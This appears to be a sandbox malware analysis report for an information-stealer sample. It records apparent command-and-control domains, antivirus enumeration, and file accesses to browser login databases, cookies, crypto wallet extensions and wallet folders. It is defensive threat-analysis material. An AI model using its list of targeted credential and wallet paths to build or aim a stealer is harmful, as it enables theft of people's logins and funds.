            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696497155f
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696497155t
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696497155s
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe | Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: associationokeo.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: turkeyunlikelyofw.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: pooreveningfuseor.pw
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: edurestunningcrackyow.fun
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: detectordiscusser.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: relevantvoicelesskw.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: colorfulequalugliess.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: wisemassiveharmonious.shop
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmp; String found in binary or memory: unhappytidydryypwto.shop
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1438996556.0000000001463000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1439136954.0000000001476000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match; File source: sslproxydump.pcap, type: PCAP
            Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236, type: MEMORYSTR
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: 4<d4<d4<Wallets/Electrum-LTC53<C:\Users\user\AppData\Roaming\Electrum-LTC\wallets3p2<%appdata%\Electrum-LTC\wallets<*
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: 4<d4<d4<Wallets/ElectronCash53<C:\Users\user\AppData\Roaming\ElectronCash\wallets3p2<%appdata%\ElectronCash\wallets<*
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: 1<window-state.json
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: 4<d4<d4<Wallets/Exodus<C:\Users\user\AppData\Roaming\Exodus\exodus.wallet3p2<%appdata%\Exodus\exodus.wallet<keystoreC
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: ExodusWeb3
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: d4<app-store.json<Wallets/BinanceC:\Users\user\AppData\Roaming\Binancep2<%appdata%\Binance mC
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: d4<Wallets/Ethereum<_lC
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: keystore
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463595133.00000000010F5000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: 4<d4<d4<Wallets/Ledger Live53<C:\Users\user\AppData\Roaming\Ledger Live*p2<%appdata%\Ledger Live
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\Application Data\Mozilla\Firefox
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\key4.db
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
